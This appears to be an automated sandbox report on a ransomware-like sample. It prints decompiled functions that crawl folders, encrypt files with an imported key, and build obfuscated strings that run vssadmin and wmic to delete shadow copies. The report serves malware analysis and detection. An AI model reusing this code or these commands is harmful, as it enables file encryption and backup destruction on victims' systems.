Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: File$Findlstrcmplstrlen$CloseVirtuallstrcat$AllocCreateFirstFreeHandleNextReadSize
String ID: *******************$.sql
API String ID: 3616287438-58436570
Opcode ID: e1a1c498bde115124241d1f905a8c8b844503e7e1923b4e09b2d9b7d9f40edc2
Instruction ID: 29cae4d1eae6944ee6fb77546c8a4b04e3289a8b1c81608c132d23b083c46882
Opcode Fuzzy Hash: e1a1c498bde115124241d1f905a8c8b844503e7e1923b4e09b2d9b7d9f40edc2
Instruction Fuzzy Hash: 91417171A01219ABDB209B65AC89FFE77BDEF05711F4040E9F901E3141DBF8AA168F60

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB8400 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 96
encryptionlibrarymemoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0FBB8400(intOrPtr __ecx, intOrPtr __edx) {
				long* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v34;
				short _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				long** _t25;
				struct HINSTANCE__* _t33;
				_Unknown_base(*)()* _t34;
				long _t40;
				void* _t42;
				void* _t46;
				void* _t47;
				void* _t48;

				_t46 = 0;
				_v16 = __ecx;
				_t25 =  &_v8;
				_v12 = __edx;
				__imp__CryptAcquireContextW(_t25, 0, 0, 1, 0xf0000000);
				if(_t25 == 0) {
					L10:
					return _t46;
				} else {
					_t42 = 0;
					do {
						_t4 = _t42 + 0x61; // 0x61
						 *((char*)(_t48 + _t42 - 0x38)) = _t4;
						_t42 = _t42 + 1;
					} while (_t42 < 0x1a);
					_t40 = __edx + 1;
					_t47 = VirtualAlloc(0, _t40, 0x3000, 0x40);
					if(_t47 == 0 || _v12 >= _t40) {
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t47, 0, 0x8000);
						return 0;
					} else {
						_v48 = 0x70797243;
						_v44 = 0x6e654774;
						_v40 = 0x646e6152;
						_v36 = 0x6d6f;
						_v34 = 0;
						_v32 = 0x61766441;
						_v28 = 0x32336970;
						_v24 = 0x6c6c642e;
						_v20 = 0;
						_t33 = GetModuleHandleA( &_v32);
						if(_t33 != 0) {
							L7:
							_t19 =  &_v48; // 0x70797243
							_t34 = GetProcAddress(_t33, _t19);
							if(_t34 != 0) {
								 *_t34(_v8, _v12, _v16);
								_t46 =  !=  ? 1 : _t46;
							}
						} else {
							_t18 =  &_v32; // 0x61766441
							_t33 = LoadLibraryA(_t18);
							if(_t33 != 0) {
								goto L7;
							}
						}
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t47, 0, 0x8000);
						goto L10;
					}
				}
			}

0x0fbb8410
0x0fbb8412
0x0fbb8417
0x0fbb841d
0x0fbb8420
0x0fbb8428
0x0fbb84f2
0x0fbb84fa
0x0fbb842e
0x0fbb842e
0x0fbb8430
0x0fbb8430
0x0fbb8433
0x0fbb8437
0x0fbb8438
0x0fbb8444
0x0fbb844e
0x0fbb8452
0x0fbb8500
0x0fbb850e
0x0fbb851c
0x0fbb8461
0x0fbb8464
0x0fbb846c
0x0fbb8473
0x0fbb847a
0x0fbb8480
0x0fbb8484
0x0fbb848b
0x0fbb8492
0x0fbb8499
0x0fbb849d
0x0fbb84a5
0x0fbb84b5
0x0fbb84b5
0x0fbb84ba
0x0fbb84c2
0x0fbb84cd
0x0fbb84d6
0x0fbb84d6
0x0fbb84a7
0x0fbb84a7
0x0fbb84ab
0x0fbb84b3
0x00000000
0x00000000
0x0fbb84b3
0x0fbb84de
0x0fbb84ec
0x00000000
0x0fbb84ec
0x0fbb8452

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0FBB8420
VirtualAlloc.KERNEL32(00000000,00000007,00003000,00000040), ref: 0FBB8448
GetModuleHandleA.KERNEL32(?), ref: 0FBB849D
LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0FBB84AB
GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0FBB84BA
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FBB84DE
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBB84EC
CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0FBB292B), ref: 0FBB8500
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0FBB292B), ref: 0FBB850E

Strings

CryptGenRandomAdvapi32.dll, xrefs: 0FBB84B5, 0FBB84B8
Advapi32.dll, xrefs: 0FBB84A7, 0FBB84AA

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
API String ID: 3996966626-2152921537
Opcode ID: 94c2bcdb252b355de2f304e1b4fed482be16934230c65f3f27cc097bd5585056
Instruction ID: dd4cef6e4cd47fcea320fda418f32fdf81f1995130b655b07fda6dc56239aaef
Opcode Fuzzy Hash: 94c2bcdb252b355de2f304e1b4fed482be16934230c65f3f27cc097bd5585056
Instruction Fuzzy Hash: 3E317471E00209AFDB108FA69C45BEEBB7DEB45711F504059FA05F6140D7B89A128F65

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB6660 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 89
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0FBB6660(BYTE* _a4, int _a8, int _a12, intOrPtr* _a16, intOrPtr _a20) {
				long* _v8;
				long* _v12;
				int _v16;
				char _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long** _t26;
				char* _t31;
				int _t33;
				long _t36;

				EnterCriticalSection(0xfbc2a48);
				_v8 = 0;
				_v12 = 0;
				_t26 =  &_v8;
				__imp__CryptAcquireContextW(_t26, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0xf0000000);
				if(_t26 != 0) {
					L6:
					_v16 = 0;
					if(CryptImportKey(_v8, _a4, _a8, 0, 0,  &_v12) != 0) {
						_v20 = 0xa;
						_t31 =  &_v20;
						__imp__CryptGetKeyParam(_v12, 8,  &_v28, _t31, 0);
						_v32 = _t31;
						 *_a16 = 0xc8;
						_t33 = _a12;
						__imp__CryptEncrypt(_v12, 0, 1, 0, _t33, _a16, _a20);
						_v16 = _t33;
						_v24 = GetLastError();
						if(_v16 == 0) {
							E0FBB36C0(_t34);
						}
					}
					CryptReleaseContext(_v8, 0);
					LeaveCriticalSection(0xfbc2a48);
					return _v16;
				}
				_t36 = GetLastError();
				if(_t36 != 0x80090016) {
					return 0;
				}
				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
				if(_t36 != 0) {
					goto L6;
				}
				return 0;
			}

0x0fbb666b
0x0fbb6671
0x0fbb6678
0x0fbb668d
0x0fbb6691
0x0fbb6699
0x0fbb66d1
0x0fbb66d1
0x0fbb66f4
0x0fbb66f6
0x0fbb66ff
0x0fbb670d
0x0fbb6713
0x0fbb6719
0x0fbb6727
0x0fbb6735
0x0fbb673b
0x0fbb6744
0x0fbb674b
0x0fbb6750
0x0fbb6750
0x0fbb674b
0x0fbb675b
0x0fbb6766
0x00000000
0x0fbb676c
0x0fbb669b
0x0fbb66a6
0x00000000
0x0fbb66ca
0x0fbb66b7
0x0fbb66bf
0x00000000
0x0fbb66c8
0x00000000

APIs

EnterCriticalSection.KERNEL32(0FBC2A48,?,0FBB38F4,00000000,00000000,00000000,?,00000800), ref: 0FBB666B
CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,?,0FBB38F4,00000000,00000000,00000000), ref: 0FBB6691
GetLastError.KERNEL32(?,0FBB38F4,00000000,00000000,00000000), ref: 0FBB669B
CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0FBB38F4,00000000,00000000,00000000), ref: 0FBB66B7
CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,0FBB38F4,00000000,00000000), ref: 0FBB66EC
CryptGetKeyParam.ADVAPI32(00000000,00000008,0FBB38F4,0000000A,00000000,?,0FBB38F4,00000000), ref: 0FBB670D
CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,0000000A,00000000,0FBB38F4,?,0FBB38F4,00000000), ref: 0FBB6735
GetLastError.KERNEL32(?,0FBB38F4,00000000), ref: 0FBB673E
CryptReleaseContext.ADVAPI32(00000000,00000000,?,0FBB38F4,00000000,00000000), ref: 0FBB675B
LeaveCriticalSection.KERNEL32(0FBC2A48,?,0FBB38F4,00000000,00000000), ref: 0FBB6766

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 0FBB6686, 0FBB66AC

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireCriticalErrorLastSection$EncryptEnterImportLeaveParamRelease
String ID: Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 72144047-1948191093
Opcode ID: 136862998b2e92ad063ee5fd1c3803511fb43bead36e5b205f1028dd225adc6b
Instruction ID: 0753f8703926bca8eac1a93ace11e7b7bc086b009e83f0504a0633770c4962b0
Opcode Fuzzy Hash: 136862998b2e92ad063ee5fd1c3803511fb43bead36e5b205f1028dd225adc6b
Instruction Fuzzy Hash: 4A314175A40309BBDB10DFA1ED45FEE7BB9EB48701F504188FA05A7180DBF9A9119FA0

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB6DF0 Relevance: 13.6, APIs: 9, Instructions: 109
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0FBB6DF0(void* __eax, WCHAR* __ecx, intOrPtr __edx, intOrPtr _a4, signed int* _a8, intOrPtr* _a12) {
				void* _v12;
				intOrPtr _v16;
				WCHAR* _v20;
				intOrPtr _v24;
				struct _WIN32_FIND_DATAW _v616;
				void* _t35;
				signed int _t37;
				int _t39;
				signed int _t42;
				void* _t46;
				signed int* _t48;
				WCHAR* _t53;
				intOrPtr* _t54;
				short _t57;
				WCHAR* _t63;
				void* _t67;

				_v24 = __edx;
				_t63 = __ecx;
				"SVWj@h"();
				if(__eax == 0 || E0FBB6BA0(__ecx) != 0) {
					L17:
					__eflags = 0;
					return 0;
				} else {
					E0FBB6D40(__ecx);
					_t53 =  &(_t63[lstrlenW(__ecx)]);
					_v20 = _t53;
					lstrcatW(_t63, "*");
					_t35 = FindFirstFileW(_t63,  &_v616);
					_t57 = 0;
					_v12 = _t35;
					 *_t53 = 0;
					if(_t35 != 0xffffffff) {
						_t54 = _a12;
						do {
							_t37 = lstrcmpW( &(_v616.cFileName), ".");
							__eflags = _t37;
							if(_t37 != 0) {
								_t42 = lstrcmpW( &(_v616.cFileName), L"..");
								__eflags = _t42;
								if(_t42 != 0) {
									lstrcatW(_t63,  &(_v616.cFileName));
									__eflags = _v616.dwFileAttributes & 0x00000010;
									if(__eflags == 0) {
										_v16 =  *_t54;
										_t46 = E0FBB6AB0(_t63,  &_v616, __eflags, _t57, _a4);
										_t67 = _t67 + 8;
										 *_t54 =  *_t54 + _t46;
										asm("adc [ebx+0x4], edx");
										__eflags =  *((intOrPtr*)(_t54 + 4)) -  *((intOrPtr*)(_t54 + 4));
										if(__eflags <= 0) {
											if(__eflags < 0) {
												L12:
												_t48 = _a8;
												 *_t48 =  *_t48 + 1;
												__eflags =  *_t48;
											} else {
												__eflags = _v16 -  *_t54;
												if(_v16 <  *_t54) {
													goto L12;
												}
											}
										}
									} else {
										E0FBB6DF0(lstrcatW(_t63, "\\"), _t63, _v24, _a4, _a8, _t54);
										_t67 = _t67 + 0xc;
									}
									_t57 = 0;
									__eflags = 0;
									 *_v20 = 0;
								}
							}
							_t39 = FindNextFileW(_v12,  &_v616);
							__eflags = _t39;
						} while (_t39 != 0);
						FindClose(_v12);
						goto L17;
					} else {
						return 0xdeadbeaf;
					}
				}
			}

0x0fbb6dfc
0x0fbb6dff
0x0fbb6e01
0x0fbb6e08
0x0fbb6f36
0x0fbb6f36
0x0fbb6f3c
0x0fbb6e1d
0x0fbb6e1d
0x0fbb6e35
0x0fbb6e38
0x0fbb6e3b
0x0fbb6e45
0x0fbb6e4b
0x0fbb6e4d
0x0fbb6e50
0x0fbb6e56
0x0fbb6e64
0x0fbb6e70
0x0fbb6e7c
0x0fbb6e82
0x0fbb6e84
0x0fbb6e96
0x0fbb6e9c
0x0fbb6e9e
0x0fbb6ea8
0x0fbb6eaa
0x0fbb6eb1
0x0fbb6ee2
0x0fbb6ee5
0x0fbb6eea
0x0fbb6eed
0x0fbb6eef
0x0fbb6ef2
0x0fbb6ef5
0x0fbb6ef7
0x0fbb6f00
0x0fbb6f00
0x0fbb6f03
0x0fbb6f03
0x0fbb6ef9
0x0fbb6efc
0x0fbb6efe
0x00000000
0x00000000
0x0fbb6efe
0x0fbb6ef7
0x0fbb6eb3
0x0fbb6ec7
0x0fbb6ecc
0x0fbb6ecc
0x0fbb6f0e
0x0fbb6f0e
0x0fbb6f10
0x0fbb6f10
0x0fbb6e9e
0x0fbb6f1d
0x0fbb6f23
0x0fbb6f23
0x0fbb6f2e
0x00000000
0x0fbb6e58
0x0fbb6e63
0x0fbb6e63
0x0fbb6e56

APIs

Part of subcall function 0FBB6780: VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,0FBB6E06,00000000,?,?), ref: 0FBB6793
Part of subcall function 0FBB6780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,0FBB6E06,00000000,?,?), ref: 0FBB685A
Part of subcall function 0FBB6780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,0FBB6E06,00000000,?,?), ref: 0FBB6874
Part of subcall function 0FBB6780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,0FBB6E06,00000000,?,?), ref: 0FBB688E
Part of subcall function 0FBB6780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,0FBB6E06,00000000,?,?), ref: 0FBB68A8

Part of subcall function 0FBB6BA0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0FBB6BB2
Part of subcall function 0FBB6BA0: lstrcatW.KERNEL32 ref: 0FBB6BC4
Part of subcall function 0FBB6BA0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0FBB6BD2
Part of subcall function 0FBB6BA0: lstrcmpW.KERNEL32(?,0FBBFF48,?,?), ref: 0FBB6BFC
Part of subcall function 0FBB6BA0: lstrcmpW.KERNEL32(?,0FBBFF4C,?,?), ref: 0FBB6C12
Part of subcall function 0FBB6BA0: lstrcatW.KERNEL32 ref: 0FBB6C24
Part of subcall function 0FBB6BA0: lstrlenW.KERNEL32(00000000,?,?), ref: 0FBB6C2B
Part of subcall function 0FBB6BA0: lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0FBB6C5A
Part of subcall function 0FBB6BA0: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 0FBB6C71
Part of subcall function 0FBB6BA0: GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0FBB6C7C
Part of subcall function 0FBB6BA0: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0FBB6C9A
Part of subcall function 0FBB6BA0: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 0FBB6CAF

Part of subcall function 0FBB6D40: VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,0FBB6E22,00000000,?,?), ref: 0FBB6D55
Part of subcall function 0FBB6D40: wsprintfW.USER32 ref: 0FBB6D63
Part of subcall function 0FBB6D40: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0FBB6D7F
Part of subcall function 0FBB6D40: GetLastError.KERNEL32(?,?), ref: 0FBB6D8C
Part of subcall function 0FBB6D40: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0FBB6DD8

lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0FBB6E23
lstrcatW.KERNEL32 ref: 0FBB6E3B
FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0FBB6E45
lstrcmpW.KERNEL32(?,0FBBFF48,?,?), ref: 0FBB6E7C
lstrcmpW.KERNEL32(?,0FBBFF4C,?,?), ref: 0FBB6E96
lstrcatW.KERNEL32 ref: 0FBB6EA8
lstrcatW.KERNEL32 ref: 0FBB6EB9
FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0FBB6F1D
FindClose.KERNEL32(00003000,?,?), ref: 0FBB6F2E

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: File$lstrcatlstrcmp$FindFolderPathSpecialVirtual$Alloclstrlen$CreateFirst$CloseErrorFreeLastNextReadSizewsprintf
String ID:
API String ID: 664581897-0
Opcode ID: e55e1c924b6f0d141b216c7f8f4bbec9092c02613feca323f2df5c37a9bed9b4
Instruction ID: 3a555b8cf90f93f9f9ec704f32b7e93ef9779709b22e646535cdff3c1c8f6ff9
Opcode Fuzzy Hash: e55e1c924b6f0d141b216c7f8f4bbec9092c02613feca323f2df5c37a9bed9b4
Instruction Fuzzy Hash: 5F316A71E00219ABCF10AF65EC84AFEBBBAEF45311F4441D9E805E7151EBB4AE518F60

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB34F0 Relevance: 12.1, APIs: 8, Instructions: 79
memorystringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBB34F0(CHAR* __ecx, WCHAR** __edx, WCHAR** _a4) {
				int _v8;
				CHAR* _v12;
				WCHAR** _v16;
				long _t11;
				WCHAR* _t17;
				WCHAR* _t18;
				void* _t23;
				void* _t28;
				int _t29;
				WCHAR** _t30;

				_v16 = __edx;
				_v12 = __ecx;
				_t29 = 0;
				_t11 = lstrlenA(__ecx);
				_v8 = _t11;
				_t23 = VirtualAlloc(0, _t11, 0x3000, 4);
				if(_t23 != 0) {
					if(CryptStringToBinaryA(_v12, 0, 1, _t23,  &_v8, 0, 0) != 0) {
						_t17 = VirtualAlloc(0, 0x100, 0x3000, 4);
						_t30 = _v16;
						 *_t30 = _t17;
						_t18 = VirtualAlloc(0, 0x100, 0x3000, 4);
						_t28 = _t23;
						 *_a4 = _t18;
						if( *_t23 != 0x3b) {
							do {
								_t28 = _t28 + 1;
							} while ( *_t28 != 0x3b);
						}
						 *_t28 = 0;
						wsprintfW( *_t30, L"%S", _t23);
						_t8 = _t28 + 1; // 0x2
						wsprintfW( *_a4, L"%S", _t8);
						_t29 = 1;
					}
					VirtualFree(_t23, 0, 0x8000);
				}
				return _t29;
			}

0x0fbb34fa
0x0fbb34ff
0x0fbb3502
0x0fbb3504
0x0fbb3519
0x0fbb351e
0x0fbb3522
0x0fbb353d
0x0fbb354c
0x0fbb354e
0x0fbb355f
0x0fbb3561
0x0fbb3566
0x0fbb356b
0x0fbb356d
0x0fbb3570
0x0fbb3570
0x0fbb3571
0x0fbb3570
0x0fbb3584
0x0fbb3587
0x0fbb3589
0x0fbb3597
0x0fbb359c
0x0fbb359c
0x0fbb35a9
0x0fbb35a9
0x0fbb35b7

APIs

lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,0FBB3673,00000000), ref: 0FBB3504
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,0FBB3673,00000000), ref: 0FBB351C
CryptStringToBinaryA.CRYPT32(0FBB3673,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0FBB3535
VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,?,0FBB3673,00000000), ref: 0FBB354C
VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,?,0FBB3673,00000000), ref: 0FBB3561
wsprintfW.USER32 ref: 0FBB3587
wsprintfW.USER32 ref: 0FBB3597
VirtualFree.KERNEL32(00000000,00000000,00008000,?,0FBB3673,00000000), ref: 0FBB35A9

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$wsprintf$BinaryCryptFreeStringlstrlen
String ID:
API String ID: 2885909284-0
Opcode ID: ea10dbf4adc96f07a948c5e8ed1ee1907707d88a611e594d7ff3a6e57bb71bb1
Instruction ID: f2d3db67f4b59905d9d01842de0dd65e87684e555520ab15ce15fa2a121ff3ca
Opcode Fuzzy Hash: ea10dbf4adc96f07a948c5e8ed1ee1907707d88a611e594d7ff3a6e57bb71bb1
Instruction Fuzzy Hash: 4021C371A40218BFEB219AA99C41FAABFECEF45750F1400A5FA04F7281D6F56A018F90

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB45B0 Relevance: 78.8, APIs: 5, Strings: 40, Instructions: 99
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0FBB45B0(void* __eflags) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char _v120;
				short _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				char _v152;
				short _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char _v172;
				short* _v176;
				short* _t51;
				WCHAR* _t59;
				void* _t62;
				signed int _t66;
				void* _t69;

				if(E0FBB3CF0(_t62) == 0) {
					_v172 = 0x63005c;
					_v168 = 0x64006d;
					_v8 = 0;
					_t59 =  &_v172;
					_v164 = 0x65002e;
					_t51 =  &_v84;
					_v160 = 0x650078;
					_v156 = 0;
					_v84 = 0x63002f;
					_v80 = 0x760020;
					_v76 = 0x730073;
					_v72 = 0x640061;
					_v68 = 0x69006d;
					_v64 = 0x20006e;
					_v60 = 0x650064;
					_v56 = 0x65006c;
					_v52 = 0x650074;
					_v48 = 0x730020;
					_v44 = 0x610068;
					_v40 = 0x6f0064;
					_v36 = 0x730077;
					_v32 = 0x2f0020;
					_v28 = 0x6c0061;
					_v24 = 0x20006c;
					_v20 = 0x71002f;
					_v16 = 0x690075;
					_v12 = 0x740065;
				} else {
					_v152 = 0x77005c;
					_v148 = 0x650062;
					_t59 =  &_v152;
					_v144 = 0x5c006d;
					_t51 =  &_v120;
					_v140 = 0x6d0077;
					_v136 = 0x630069;
					_v132 = 0x65002e;
					_v128 = 0x650078;
					_v124 = 0;
					_v120 = 0x680073;
					_v116 = 0x640061;
					_v112 = 0x77006f;
					_v108 = 0x6f0063;
					_v104 = 0x790070;
					_v100 = 0x640020;
					_v96 = 0x6c0065;
					_v92 = 0x740065;
					_v88 = 0x65;
				}
				_v176 = _t51;
				_t69 = VirtualAlloc(0, 0x400, 0x3000, 0x40);
				if(_t69 != 0) {
					GetSystemDirectoryW(_t69, 0x100);
					lstrcatW(_t69, _t59);
					ShellExecuteW(0, L"open", _t69, _v176, 0, 0);
					asm("sbb edi, edi");
					_t66 =  ~0x20;
				} else {
					_t66 = 0;
				}
				VirtualFree(_t69, 0, 0x8000);
				return _t66;
			}

0x0fbb45c6
0x0fbb4662
0x0fbb466c
0x0fbb4674
0x0fbb467c
0x0fbb4680
0x0fbb4688
0x0fbb468c
0x0fbb4694
0x0fbb4699
0x0fbb46a1
0x0fbb46a9
0x0fbb46b1
0x0fbb46b9
0x0fbb46c1
0x0fbb46c9
0x0fbb46d4
0x0fbb46df
0x0fbb46ea
0x0fbb46f5
0x0fbb4700
0x0fbb470b
0x0fbb4716
0x0fbb4721
0x0fbb472c
0x0fbb4737
0x0fbb4742
0x0fbb474d
0x0fbb45cc
0x0fbb45ce
0x0fbb45d6
0x0fbb45de
0x0fbb45e2
0x0fbb45ea
0x0fbb45ee
0x0fbb45f6
0x0fbb45fe
0x0fbb4606
0x0fbb460e
0x0fbb4613
0x0fbb461b
0x0fbb4623
0x0fbb462b
0x0fbb4633
0x0fbb463b
0x0fbb4643
0x0fbb464b
0x0fbb4653
0x0fbb4653
0x0fbb4766
0x0fbb4775
0x0fbb4779
0x0fbb4785
0x0fbb478d
0x0fbb47a3
0x0fbb47ab
0x0fbb47ad
0x0fbb477b
0x0fbb477b
0x0fbb477b
0x0fbb47b7
0x0fbb47c5

APIs

Part of subcall function 0FBB3CF0: _memset.LIBCMT ref: 0FBB3D42
Part of subcall function 0FBB3CF0: VerSetConditionMask.KERNEL32 ref: 0FBB3D66
Part of subcall function 0FBB3CF0: VerSetConditionMask.KERNEL32 ref: 0FBB3D6A
Part of subcall function 0FBB3CF0: VerSetConditionMask.KERNEL32 ref: 0FBB3D6E
Part of subcall function 0FBB3CF0: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0FBB3D95

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000040), ref: 0FBB476F
GetSystemDirectoryW.KERNEL32(00000000,00000100), ref: 0FBB4785
lstrcatW.KERNEL32 ref: 0FBB478D
ShellExecuteW.SHELL32(00000000,open,00000000,?,00000000,00000000), ref: 0FBB47A3
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBB47B7

Strings

w, xrefs: 0FBB470B
, xrefs: 0FBB4716
s, xrefs: 0FBB4613
., xrefs: 0FBB45FE
e, xrefs: 0FBB464B
d, xrefs: 0FBB4700
s, xrefs: 0FBB46A9
e, xrefs: 0FBB4643
l, xrefs: 0FBB472C
o, xrefs: 0FBB4623
x, xrefs: 0FBB468C
p, xrefs: 0FBB4633
w, xrefs: 0FBB45EE
/, xrefs: 0FBB4699
t, xrefs: 0FBB46DF
, xrefs: 0FBB463B
i, xrefs: 0FBB45F6
, xrefs: 0FBB46A1
u, xrefs: 0FBB4742
m, xrefs: 0FBB46B9
open, xrefs: 0FBB479C
e, xrefs: 0FBB474D
\, xrefs: 0FBB45CE
\, xrefs: 0FBB4662
a, xrefs: 0FBB4721
e, xrefs: 0FBB4653
, xrefs: 0FBB46EA
l, xrefs: 0FBB46D4
m, xrefs: 0FBB45E2
x, xrefs: 0FBB4606
b, xrefs: 0FBB45D6
m, xrefs: 0FBB466C
a, xrefs: 0FBB46B1
., xrefs: 0FBB4680
h, xrefs: 0FBB46F5
a, xrefs: 0FBB461B
/, xrefs: 0FBB4737
c, xrefs: 0FBB462B
